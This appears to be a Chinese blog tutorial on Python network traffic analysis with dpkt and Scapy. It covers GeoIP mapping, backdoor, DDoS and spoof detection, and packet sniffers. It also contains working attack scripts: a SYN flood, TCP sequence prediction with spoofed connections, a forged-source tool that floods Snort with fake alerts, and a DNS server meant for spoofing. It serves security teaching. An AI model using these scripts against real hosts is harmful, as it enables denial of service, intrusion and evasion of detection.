zoukankan      html  css  js  c++  java
  • 使用 Python 分析网络流量

    IP地址精准识别 (三方库)

    github地址下载:https://github.com/maxmind/GeoIP2-python

    下载需要注册用户,然后下载离线数据库:https://www.maxmind.com/en/accounts/current/geoip/downloads

     抓取数据包格式,然后保存为指定格式。

     通过代码,饥饿和数据库提取出位置

    >>> import geoip2.database>>> reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')>>> response = reader.city('128.101.101.101')
    >>>
    >>> response.country.iso_code
    'US'
    >>> response.country.name
    'United States'
    >>> response.country.names['zh-CN']
    u'美国'
    >>>
    >>> response.subdivisions.most_specific.name
    'Minnesota'
    >>> response.subdivisions.most_specific.iso_code
    'MN'
    >>>
    >>> response.city.name
    'Minneapolis'
    >>>
    >>> response.postal.code
    '55455'
    >>>
    >>> response.location.latitude
    44.9733
    >>> response.location.longitude
    -93.2323
    >>>
    >>> response.traits.network
    IPv4Network('128.101.101.0/24')
    >>>
    >>> reader.close()

     改造代码如下所示;

    #coding=utf-8
    import dpkt
    import socket
    import geoip2.database
    
    def GetPcap(pcap):
        ret = []
        for timestamp,packet in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(packet)
                ip = eth.data
                src = socket.inet_ntoa(ip.src)
                dst = socket.inet_ntoa(ip.dst)
                # print("[+] 源地址: %-16s --> 目标地址: %-16s"%(src,dst))
                ret.append(dst)
            except:
                pass
        return set(ret)
    
    if __name__ == '__main__':
        fp = open('data.pcap','rb')
        pcap = dpkt.pcap.Reader(fp)
        addr = GetPcap(pcap)
        reader = geoip2.database.Reader("d://GeoLite2-City.mmdb")
        for item in addr:
            try:
                response = reader.city(item)
                print("IP地址: %-16s --> " %item,end="")
                print("网段: %-16s --> " %response.traits.network,end="")
                print("经度: %-10s 纬度: %-10s --> " %(response.location.latitude, response.location.longitude),end="")
                print("地区: {}".format(response.country.names["zh-CN"]),end="
    ")
            except Exception:
                pass

     

    使用Python画谷歌地图

    #coding=utf-8
    # pip install python-geoip-geolite2
    # github地址下载:https://github.com/maxmind/GeoIP2-python
    # 离线数据库:https://www.maxmind.com/en/accounts/current/geoip/downloads
    import dpkt
    import socket
    import geoip2.database
    from optparse import OptionParser

    def GetPcap(pcap):
    ret = []
    for timestamp,packet in pcap:
    try:
    eth = dpkt.ethernet.Ethernet(packet)
    ip = eth.data
    src = socket.inet_ntoa(ip.src)
    dst = socket.inet_ntoa(ip.dst)
    # print("[+] 源地址: %-16s --> 目标地址: %-16s"%(src,dst))
    ret.append(dst)
    except:
    pass
    return set(ret)

    def retKML(addr,longitude,latitude):
    kml = (
    '<Placemark> '
    '<name>%s</name> '
    '<Point> '
    '<coordinates>%6f,%6f</coordinates> '
    '</Point> '
    '</Placemark> '
    ) %(addr, longitude, latitude)
    return kml

    if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option("-p", "--pcap", dest="pcap_file", help="set -p *.pcap")
    parser.add_option("-d", "--mmdb", dest="mmdb_file", help="set -d *.mmdb")
    (options, args) = parser.parse_args()
    if options.pcap_file and options.mmdb_file:
    fp = open(options.pcap_file,'rb')
    pcap = dpkt.pcap.Reader(fp)
    addr = GetPcap(pcap)
    reader = geoip2.database.Reader(options.mmdb_file)

    kmlheader = '<?xml version="1.0" encoding="UTF-8"?>
    <kml xmlns="http://www.opengis.net/kml/2.2"> <Document> '
    with open("GoogleEarth.kml", "w") as f:
    f.write(kmlheader)
    f.close()

    for item in addr:
    try:
    response = reader.city(item)
    print("IP地址: %-16s --> " %item,end="")
    print("网段: %-16s --> " %response.traits.network,end="")
    print("经度: %-10s 纬度: %-10s --> " %(response.location.latitude, response.location.longitude),end="")
    print("地区: {}".format(response.country.names["zh-CN"]),end=" ")

    with open("GoogleEarth.kml","a+") as f:
    f.write(retKML(item,response.location.latitude, response.location.longitude))
    f.close()
    except Exception:
    pass

    kmlfooter = '</Document> </kml> '
    with open("GoogleEarth.kml", "a+") as f:
    f.write(kmlfooter)
    f.close()
    else:
    parser.print_help()

    接着访问谷歌地球:https://www.google.com/earth/  直接将生成的googleearth.kml 导入即可完成定位。

    用于 Windows(32 位)的 7.3.2 版 https://dl.google.com/dl/earth/client/advanced/current/googleearthprowin-7.3.2.exe

    使用Dpkt 发现URL中存在的.zip 字样链接

    #coding=utf-8
    import dpkt
    import socket
    
    def FindPcapWord(pcap,WordKey):
        for ts,buf in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(buf)
                ip = eth.data
                src = socket.inet_ntoa(ip.src)
                dst = socket.inet_ntoa(ip.dst)
                tcp = ip.data
                http = dpkt.http.Request(tcp.data)
                if(http.method == "GET"):
                    uri = http.uri.lower()
                    if WordKey in uri:
                        print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri))
            except Exception:
                pass
    
    fp = open("D://aaa.pcap","rb")
    pcap = dpkt.pcap.Reader(fp)
    FindPcapWord(pcap,"wang.zip")

    解析本机数据包中是否包含后门

    #coding=utf-8
    import dpkt
    import socket
    
    def FindPcapWord(pcap,WordKey):
        for timestamp,packet in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(packet)
                ip = eth.data
                src = socket.inet_ntoa(ip.src)
                dst = socket.inet_ntoa(ip.dst)
                tcp = ip.data
                http = dpkt.http.Request(tcp.data)
                if(http.method == "GET"):
                    uri = http.uri.lower()
                    if WordKey in uri:
                        print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri))
            except Exception:
                pass
    
    def FindHivemind(pcap):
        for timestamp,packet in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(packet)
                ip = eth.data
                tcp = ip.data
    
                src = socket.inet_ntoa(ip.src)
                dst = socket.inet_ntoa(ip.dst)
                sport = tcp.sport
                dport = tcp.dport
                # print("[+] 源地址: {}:{} --> 目标地址:{}:{}".format(src,sport,dst,dport))
                if dport == 80 and dst == "125.39.247.226":
                    # 如果数据流中存在cmd等明文命令则说明可能存在后门
                    if '[cmd]# ' in tcp.data.lower():
                        print("[+] {}:{}".format(dst,dport))
            except Exception:
                pass
    
    fp = open("D://aaa.pcap","rb")
    pcap = dpkt.pcap.Reader(fp)
    FindHivemind(pcap)

    实时检测DDoS攻击:

    主要通过设置检测不正常数据包数量的阈值来判断是否存在DDoS攻击。

    #coding=utf-8
    import dpkt
    import socket
    
    def FindPcapWord(pcap,WordKey):
        for timestamp,packet in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(packet)
                ip = eth.data
                src = socket.inet_ntoa(ip.src)
                dst = socket.inet_ntoa(ip.dst)
                tcp = ip.data
                http = dpkt.http.Request(tcp.data)
                if(http.method == "GET"):
                    uri = http.uri.lower()
                    if WordKey in uri:
                        print("[+] 源地址: {} --> 目标地址: {} 检索到URL中存在 {}".format(src,dst,uri))
            except Exception:
                pass
    
    def FindHivemind(pcap):
        for timestamp,packet in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(packet)
                ip = eth.data
                tcp = ip.data
                src = socket.inet_ntoa(ip.src)
                dst = socket.inet_ntoa(ip.dst)
                sport = tcp.sport
                dport = tcp.dport
                # print("[+] 源地址: {}:{} --> 目标地址:{}:{}".format(src,sport,dst,dport))
                if dport == 80 and dst == "125.39.247.226":
                    # 如果数据流中存在cmd等明文命令则说明可能存在后门
                    if '[cmd]# ' in tcp.data.lower():
                        print("[+] {}:{}".format(dst,dport))
            except Exception:
                pass
    
    def FindDDosAttack(pcap):
        pktCount = {}
        for timestamp,packet in pcap:
            try:
                eth = dpkt.ethernet.Ethernet(packet)
                ip = eth.data
                tcp = ip.data
                src = socket.inet_ntoa(ip.src)
                dst = socket.inet_ntoa(ip.dst)
                sport = tcp.sport
                # 累计判断各个src地址对目标地址80端口访问次数
                if dport == 80:
                    stream = src + ":" + dst
                    if pktCount.has_key(stream):
                        pktCount[stream] = pktCount[stream] + 1
                    else:
                        pktCount[stream] = 1
            except Exception:
                pass
        for stream in pktCount:
            pktSent = pktCount[stream]
            # 如果超过设置的检测阈值500,则判断为DDOS攻击行为
            if pktSent > 500:
                src = stream.split(":")[0]
                dst = stream.split(":")[1]
                print("[+] 源地址: {} 攻击: {} 流量: {} pkts.".format(src,dst,str(pktSent)))
    
    
    if __name__ == "__main__":
        fp = open("D://data.pcap","rb")
        pcap = dpkt.pcap.Reader(fp)
        FindPcapWord(pcap,"wang.zip")

    理解数据包TTL字段

    TTL即 time-to-live,由8比特组成,可以用来确定在到达目的地之前数据包经过了几跳。当计算机发送一个IP数据包时会设置TTL字段为数据包在到达目的地之前所应经过的中继跳转的上限值,数据包每经过一个路由设备,TTL值就自减一,若减至0还未到目的地,路由器会丢弃该数据包以防止无限路由循环。

    Nmap进行伪装扫描时,伪造数据包的TTL值是没有经过计算的,因而可以利用TTL值来分析所有来自Nmap扫描的数据包,对于每个被记录为Nmap扫描的源地址,发送一个ICMP数据包来确定源地址与目标机器之间隔了几跳,从而来辨别真正的扫描源。

    Nmap的 -D参数实现伪造源地址扫描:nmap 192.168.220.128 -D 8.8.8.8

    Wireshark抓包分析,发现确实是有用伪造源地址进行扫描:

    点击各个数据包查看TTL值:

    可以看到默认扫描的Nmap扫描,其ttl值是随机的。

    用Scapy解析TTL的值

    这里使用Scapy库来获取源地址IP及其TTL值。

    #coding=utf-8
    from scapy.all import *
    # 避免IPy与
    from IPy import IP as PYIP
    
    # 检查数据包的IP层,提取出IP和TTL字段的值
    def Get_TTL(pkt):
        try:
            if pkt.haslayer(IP):
                ip_src = pkt.getlayer(IP).src
                ip_sport = pkt.getlayer(IP).sport
                ip_dst = pkt.getlayer(IP).dst
                ip_dport = pkt.getlayer(IP).dport
                ip_ttl = str(pkt.ttl)
                print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl))
        except Exception:
            pass
    
    if __name__=="__main__":
        sniff(prn=Get_TTL,store=0)

    运行脚本监听,启动Nmap伪造源地址扫描即可看到如下结果:

    接着添加checkTTL()函数,主要实现对比TTL值进行源地址真伪判断:

    #!/usr/bin/python
    #coding=utf-8
    from scapy.all import *
    import time
    import optparse
    # 为避免IPy库中的IP类与Scapy库中的IP类冲突,重命名为IPTEST类
    from IPy import IP as IPTEST
    
    ttlValues = {}
    THRESH = 5
    
    # 检查数据包的IP层,提取出源IP和TTL字段的值
    def testTTL(pkt):
        try:
            if pkt.haslayer(IP):
                ipsrc = pkt.getlayer(IP).src
                ttl = str(pkt.ttl)
                checkTTL(ipsrc, ttl)
        except:
            pass
    
    def checkTTL(ipsrc, ttl):
        # 判断是否是内网私有地址
        if IPTEST(ipsrc).iptype() == 'PRIVATE':
            return
    
        # 判断是否出现过该源地址,若没有则构建一个发往源地址的ICMP包,并记录回应数据包中的TTL值
        if not ttlValues.has_key(ipsrc):
            pkt = sr1(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbose=0)
            ttlValues[ipsrc] = pkt.ttl
    
        # 若两个TTL值之差大于阈值,则认为是伪造的源地址
        if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
            print '
    [!] Detected Possible Spoofed Packet From: ' + ipsrc
            print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])
    
    def main():
        parser = optparse.OptionParser("[*]Usage python spoofDetect.py -i <interface> -t <thresh>")
        parser.add_option('-i', dest='iface', type='string', help='specify network interface')
        parser.add_option('-t', dest='thresh', type='int', help='specify threshold count ')
        (options, args) = parser.parse_args()
        if options.iface == None:
            conf.iface = 'eth0'
        else:
            conf.iface = options.iface
        if options.thresh != None:
            THRESH = options.thresh
        else:
            THRESH = 5
        sniff(prn=testTTL, store=0)
    if __name__ == '__main__':
        main()

    DNS请求包的收发

    用nslookup命令来进行一次域名查询,Wireshark抓包如下:

    可以看到客户端发送DNSQR请求包,服务器发送DNSRR响应包。

    一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。

    用Scapy找出fast-flux流量:

    解析DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量

    #coding=utf-8
    from scapy.all import *
    from IPy import IP as PYIP
    
    # 检查数据包的IP层,提取出IP和TTL字段的值
    def Get_TTL(pkt):
        try:
            if pkt.haslayer(IP):
                ip_src = pkt.getlayer(IP).src
                ip_sport = pkt.getlayer(IP).sport
                ip_dst = pkt.getlayer(IP).dst
                ip_dport = pkt.getlayer(IP).dport
                ip_ttl = str(pkt.ttl)
                print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl))
        except Exception:
            pass
    # 获取本机发送出去的DNS请求所对应的网站地址
    def Get_DNSRR(pkt):
        if pkt.haslayer(DNSRR):
            rrname = pkt.getlayer(DNSRR).rrname
            rdata = pkt.getlayer(DNSRR).rdata
            ttl = pkt.getlayer(DNSRR).ttl
            print("[+] 域名: {} --> 别名: {} --> TTL: {}".format(rrname,rdata,ttl))
    
    if __name__=="__main__":
        sniff(prn=Get_DNSRR,store=0)

    用Scapy找出Domain Flux流量

    这里只检查服务器53端口的数据包,DNS数据包有个rcode字段,当其值为3时表示域名不存在。

    #coding=utf-8
    from scapy.all import *
    from IPy import IP as PYIP
    
    # 检查数据包的IP层,提取出IP和TTL字段的值
    def Get_TTL(pkt):
        try:
            if pkt.haslayer(IP):
                ip_src = pkt.getlayer(IP).src
                ip_sport = pkt.getlayer(IP).sport
                ip_dst = pkt.getlayer(IP).dst
                ip_dport = pkt.getlayer(IP).dport
                ip_ttl = str(pkt.ttl)
                print("[+] 源地址: %15s:%-5s --> 目标地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl))
        except Exception:
            pass
    # 获取本机发送出去的DNS请求所对应的网站地址 IP --> URL
    def Get_DNSRR(pkt):
        if pkt.haslayer(DNSRR):
            rrname = pkt.getlayer(DNSRR).rrname
            rdata = pkt.getlayer(DNSRR).rdata
            ttl = pkt.getlayer(DNSRR).ttl
            print("[+] 域名: {} --> 别名: {} --> TTL: {}".format(rrname,rdata,ttl))
    
    # 获取本机发送出去的网址请求解析为IP URL --> IP
    def Get_DNSQR(pkt):
        # 判断是否含有DNSRR且存在UDP端口53
        if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
            rcode = pkt.getlayer(DNS).rcode
            qname = pkt.getlayer(DNSQR).qname
            # 若rcode为3,则表示该域名不存在
            if rcode == 3:
                print("[-] 域名解析不存在")
            else:
                print("[+] 解析存在:" + str(qname))
    
    if __name__=="__main__":
        sniff(prn=Get_DNSQR,store=0)

    使用Scapy制造SYN洪泛攻击

    使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。

    #coding=utf-8
    from scapy.all import *
    
    def synFlood(src, tgt):
        # TCP源端口不断自增一,而目标端口513不变
        for sport in range(1024, 65535):
            IPlayer = IP(src=src, dst=tgt)
            TCPlayer = TCP(sport=sport, dport=513)
            pkt = IPlayer / TCPlayer
            send(pkt)
    
    src = "192.168.220.132"
    tgt = "192.168.220.128"
    synFlood(src, tgt)

    计算TCP序列号:

    主要通过发送TCP SYN数据包来从依次收到的SYN/ACK包中计算TCP序列号之差,查看是否存在可被猜测的规律。

    #coding=utf-8
    from scapy.all import *
    
    def calTSN(tgt):
        seqNum = 0
        preNum = 0
        diffSeq = 0
        # 重复4次操作
        for x in range(1,5):
            # 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值
            # 逻辑出现问题
            # if preNum != 0:
            if seqNum != 0:
                preNum = seqNum
            # 构造并发送TCP SYN包
            pkt = IP(dst=tgt) / TCP()
            ans = sr1(pkt, verbose=0)
            # 读取SYN/ACK包的TCP序列号
            seqNum = ans.getlayer(TCP).seq
            if preNum != 0:
                diffSeq = seqNum - preNum
                print "[*] preNum: %d  seqNum: %d" % (preNum, seqNum)
                print "[+] TCP Seq Difference: " + str(diffSeq)
                print
        return seqNum + diffSeq
    
    tgt = "192.168.220.128"
    seqNum = calTSN(tgt)
    print "[+] Next TCP Sequence Number to ACK is: " + str(seqNum + 1)

    伪造TCP连接

    添加伪造主要过程为先对远程服务器进行SYN洪泛攻击、使之拒绝服务,然后猜测TCP序列号并伪造TCP连接去跟目标主机建立TCP连接。

    #!/usr/bin/python
    #coding=utf-8
    import optparse
    from scapy.all import *
    
    def synFlood(src, tgt):
        # TCP源端口不断自增一,而目标端口513不变
        for sport in range(1024, 65535):
            IPlayer = IP(src=src, dst=tgt)
            TCPlayer = TCP(sport=sport, dport=513)
            pkt = IPlayer / TCPlayer
            send(pkt)
    
    def calTSN(tgt):
        seqNum = 0
        preNum = 0
        diffSeq = 0
        # 重复4次操作
        for x in range(1,5):
            # 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值
            # 逻辑出现问题
            # if preNum != 0:
            if seqNum != 0:
                preNum = seqNum
            # 构造并发送TCP SYN包
            pkt = IP(dst=tgt) / TCP()
            ans = sr1(pkt, verbose=0)
            # 读取SYN/ACK包的TCP序列号
            seqNum = ans.getlayer(TCP).seq
            if preNum != 0:
                diffSeq = seqNum - preNum
                print "[*] preNum: %d  seqNum: %d" % (preNum, seqNum)
                print "[+] TCP Seq Difference: " + str(diffSeq)
                print
        return seqNum + diffSeq
    
    # 伪造TCP连接
    def spoofConn(src, tgt, ack):
        # 发送TCP SYN包
        IPlayer = IP(src=src, dst=tgt)
        TCPlayer = TCP(sport=513, dport=514)
        synPkt = IPlayer / TCPlayer
        send(synPkt)
    
        # 发送TCP ACK包
        IPlayer = IP(src=src, dst=tgt)
        TCPlayer = TCP(sport=513, dport=514, ack=ack)
        ackPkt = IPlayer / TCPlayer
        send(ackPkt)
    
    def main():
        parser = optparse.OptionParser('[*]Usage: python mitnickAttack.py -s <src for SYN Flood> -S <src for spoofed connection> -t <target address>')
        parser.add_option('-s', dest='synSpoof', type='string', help='specifc src for SYN Flood')
        parser.add_option('-S', dest='srcSpoof', type='string', help='specify src for spoofed connection')
        parser.add_option('-t', dest='tgt', type='string', help='specify target address')
        (options, args) = parser.parse_args()
        if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
            print parser.usage
            exit(0)
        else:
            synSpoof = options.synSpoof
            srcSpoof = options.srcSpoof
            tgt = options.tgt
    
        print '[+] Starting SYN Flood to suppress remote server.'
        synFlood(synSpoof, srcSpoof)
        print '[+] Calculating correct TCP Sequence Number.'
        seqNum = calTSN(tgt) + 1
        print '[+] Spoofing Connection.'
        spoofConn(srcSpoof, tgt, seqNum)
        print '[+] Done.'
    
    if __name__ == '__main__':
        main()

    使用Scapy愚弄IDS 入侵检测系统

    这里IDS使用的是snort,本小节主要是通过分析snort的规则,制造假的攻击迹象来触发snort的警报,从而让目标系统产生大量警告而难以作出合理的判断,ids安装过程

    yum -y install gcc flex bison zlib zlib-devel libpcap libpcap-devel pcre pcre-devel libdnet libdnet-devel tcpdump nghttp2 glibc-headers gcc-c++ openssl openssl-devel
    
    wget http://prdownloads.sourceforge.net/libdnet/libdnet-1.11.tar.gz
    tar -xzvf libdnet-1.11.tar.gz
    ./configure
    make && make install
    
    wget https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz
    tar -xzvf daq-2.0.6.tar.gz
    ./configure
    make && make install
    
    wget http://luajit.org/download/LuaJIT-2.0.5.tar.gz
    cd src/
    make && make install
    
    wget https://www.snort.org/downloads/snort/snort-2.9.15.1.tar.gz
    ./configure --enable-sourcefire
    make && make install

    snort -q -A console -i eth2 -c /etc/snort/snort.conf

    查看snort的ddos规则: vim /etc/snort/rules/ddos.rules     然后输入:/icmp_id:678 来直接查找

    看到可以利用的触发警报的规则DDoS TFN探针:ICMP id为678,ICMP type为8,内容含有“1234”。其他的特征也按照规则下面的构造即可。只要构造这个ICMP包并发送到目标主机即可。

    #!/usr/bin/python
    #coding=utf-8
    from scapy.all import *
    
    # 触发DDoS警报
    def ddosTest(src, dst, iface, count):
        pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
        send(pkt, iface=iface, count=count)
    
    src = "192.168.220.132"
    dst = "192.168.220.129"
    iface = "eth0"
    count = 1
    ddosTest(src, dst, iface, count)

    再来查看snort的exploit.rules文件中的警报规则:  vim /etc/snort/rules/exploit.rules   然后输入:/EXPLOIT ntalkd x86 Linux overflow 来查找

    可以看到,含有框出的指定字节序列就会触发警报。为了生成含有该指定字节序列的数据包,可以使用符号x,后面跟上该字节的十六进制值。注意的是其中的“89|F|”在Python中写成“x89F”即可。

    # 触发exploits警报
    def exploitTest(src, dst, iface, count):
        pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="x01x03x00x00x00x00x00x01x00x02x02xE8")
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^xB0x02x89x06xFExC8x89Fx04xB0x06x89F")
        send(pkt, iface=iface, count=count)

    接着伪造踩点或扫描的操作来触发警报。查看snort的exploit.rules文件中的警报规则:vim /etc/snort/rules/scan.rules     然后输入:/Amanda 来查找

    可以看到,只要数据包中含有框出的特征码即可触发警报。

    # 触发踩点扫描警报
    def scanTest(src, dst, iface, count):
        pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
        send(pkt)
        pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
        send(pkt, iface=iface, count=count)

    整合所有的代码,生成可以触发DDoS、exploits以及踩点扫描警报的数据包: -s参数指定发送的源地址,这里伪造源地址为1.2.3.4,-c参数指定发送的次数、只是测试就只发送一次即可。

    #coding=utf-8
    import optparse
    from scapy.all import *
    from random import randint
    
    # 触发DDoS警报
    def ddosTest(src, dst, iface, count):
        pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
        send(pkt, iface=iface, count=count)
    
    # 触发exploits警报
    def exploitTest(src, dst, iface, count):
        pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="x01x03x00x00x00x00x00x01x00x02x02xE8")
        send(pkt, iface=iface, count=count)
    
        pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^xB0x02x89x06xFExC8x89Fx04xB0x06x89F")
        send(pkt, iface=iface, count=count)
    
    # 触发踩点扫描警报
    def scanTest(src, dst, iface, count):
        pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
        send(pkt)
    
        pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
        send(pkt, iface=iface, count=count)
    
    def main():
        parser = optparse.OptionParser('[*]Usage: python idsFoil.py -i <iface> -s <src> -t <target> -c <count>')
        parser.add_option('-i', dest='iface', type='string', help='specify network interface')
        parser.add_option('-s', dest='src', type='string', help='specify source address')
        parser.add_option('-t', dest='tgt', type='string', help='specify target address')
        parser.add_option('-c', dest='count', type='int', help='specify packet count')
        (options, args) = parser.parse_args()
        if options.iface == None:
            iface = 'eth0'
        else:
            iface = options.iface
        if options.src == None:
            src = '.'.join([str(randint(1,254)) for x in range(4)])
        else:
            src = options.src
        if options.tgt == None:
            print parser.usage
            exit(0)
        else:
            dst = options.tgt
        if options.count == None:
            count = 1
        else:
            count = options.count
    
        ddosTest(src, dst, iface, count)
        exploitTest(src, dst, iface, count)
        scanTest(src, dst, iface, count)
    
    if __name__ == '__main__':
        main()

    Windows 网络嗅探 

    # -*- coding: UTF-8 -*-
    import  os
    import  socket
    import  ctypes
    
    class PromiscuousSocket (object): 
      def __init__(self):
          HOST = socket.gethostbyname(socket.gethostname())
          s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
          s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
          s.bind((HOST, 0))
          s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
    
          self.s = s
      
      def __enter__(self):
          return self.s
    
      def __exit__(self, *args, **kwargs):
          self.s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
    
    def sniffer(count, bufferSize=65565):
        with PromiscuousSocket() as s:
            for i in range(count):
              package = s.recvfrom(bufferSize)
              print(package)
    
    
    
    if __name__ == '__main__':
        sniffer(count=10) 

    Linux 网络嗅探

    import  os
    import  socket
    import  ctypes
    import fcntl 
    # 结构体封装
    class ifreq(ctypes.Structure):
        _fields_ = [("ifr_ifrn", ctypes.c_char * 16),
                    ("ifr_flags", ctypes.c_short)]
    # 需要用到的枚举值
    class FLAGS(object):
      # linux/if_ether.h
      ETH_P_ALL     = 0x0003 # all protocols
      ETH_P_IP      = 0x0800 # IP only
      # linux/if.h
      IFF_PROMISC   = 0x100
      # linux/sockios.h
      SIOCGIFFLAGS  = 0x8913 # get the active flags
      SIOCSIFFLAGS  = 0x8914 # set the active flags
    
    class PromiscuousSocketManager(object): 
      def __init__(self):
        import fcntl # posix-only
        # htons: converts 16-bit positive integers from host to network byte order
        s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(FLAGS.ETH_P_ALL))
        ifr = ifreq()
        ifr.ifr_ifrn = b'en0' #写死了,可以通过参数传递进来
        fcntl.ioctl(s, FLAGS.SIOCGIFFLAGS, ifr) # get the flags
        ifr.ifr_flags |= FLAGS.IFF_PROMISC # add the promiscuous flag
        fcntl.ioctl(s, FLAGS.SIOCSIFFLAGS, ifr) # update
        self.ifr = ifr
        self.s = s
      
      def __enter__(self):
        return self.s
    
      def __exit__(self, *args, **kwargs):
        self.ifr.ifr_flags ^= FLAGS.IFF_PROMISC # mask it off (remove)
        fcntl.ioctl(self.s, FLAGS.SIOCSIFFLAGS, self.ifr) # update
    
    def sniffer(count, bufferSize=65565):
    
        with PromiscuousSocketManager() as s:
          for i in range(count):
              package = s.recvfrom(bufferSize)
              print(package)
    
    if __name__ == '__main__':
        sniffer(count=10) 

    Scapy 网络嗅探

    # -*- coding: UTF-8 -*-
    from scapy.all import *
    
    scapy.config.conf.sniff_promisc=True #设置混杂模式
    
    def packetHandler(pkt):
        dport = pkt[IP][TCP].dport
        if dport==80 and pkt[IP][TCP].payload:
            print('捕获http请求:',pkt[IP][TCP].payload)
    if __name__ == '__main__':
        sniff(filter='tcp and port 80',prn=packetHandler,iface='en0')
        

    收藏的一个DNS迷你服务器

    <b>实现简易DNS解析服务器:</b> 具备基本的域名解析功能,通常配合DNS欺骗攻击工具一起使用效果更佳.
    ```Python
    import socketserver,struct
    
    class SinDNSQuery:
        def __init__(self, data):
            i = 1
            self.name = ''
            while True:
                d = data[i]
                if d == 0:
                    break;
                if d < 32:
                    self.name = self.name + '.'
                else:
                    self.name = self.name + chr(d)
                i = i + 1
            self.querybytes = data[0:i + 1]
            (self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
            self.len = i + 5
        def getbytes(self):
            return self.querybytes + struct.pack('>HH', self.type, self.classify)
    
    class SinDNSAnswer:
        def __init__(self, ip):
            self.name = 49164
            self.type = 1
            self.classify = 1
            self.timetolive = 190
            self.datalength = 4
            self.ip = ip
        def getbytes(self):
            res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
            s = self.ip.split('.')
            res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
            return res
    
    class SinDNSFrame:
        def __init__(self, data):
            (self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])
            self.query = SinDNSQuery(data[12:])
        def getname(self):
            return self.query.name
        def setip(self, ip):
            self.answer = SinDNSAnswer(ip)
            self.answers = 1
            self.flags = 33152
        def getbytes(self):
            res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
            res = res + self.query.getbytes()
            if self.answers != 0:
                res = res + self.answer.getbytes()
            return res
    
    class SinDNSUDPHandler(socketserver.BaseRequestHandler):
        def handle(self):
            data = self.request[0].strip()
            dns = SinDNSFrame(data)
            socket = self.request[1]
            namemap = SinDNSServer.namemap
            if(dns.query.type==1):
                name = dns.getname();
                if namemap.__contains__(name):
                    dns.setip(namemap[name])
                    socket.sendto(dns.getbytes(), self.client_address)
                elif namemap.__contains__('*'):
                    dns.setip(namemap['*'])
                    socket.sendto(dns.getbytes(), self.client_address)
                else:
                    socket.sendto(data, self.client_address)
            else:
                socket.sendto(data, self.client_address)
    
    class SinDNSServer:
        def __init__(self, port=53):
            SinDNSServer.namemap = {}
            self.port = port
        def addname(self, name, ip):
            SinDNSServer.namemap[name] = ip
        def start(self):
            HOST, PORT = "0.0.0.0", self.port
            server = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler)
            server.serve_forever()
    
    if __name__ == "__main__":
        server = SinDNSServer()
        server.addname('www.lyshark.com', '192.168.1.1')
        server.addname('*', '192.168.1.2')
        server.start()
    ```
  • 相关阅读:
    C# 获取计算机相关信息
    C# 创建Windows服务demo
    C# 嵌入互操作类型
    使用开源框架Sqlsugar结合mysql开发一个小demo
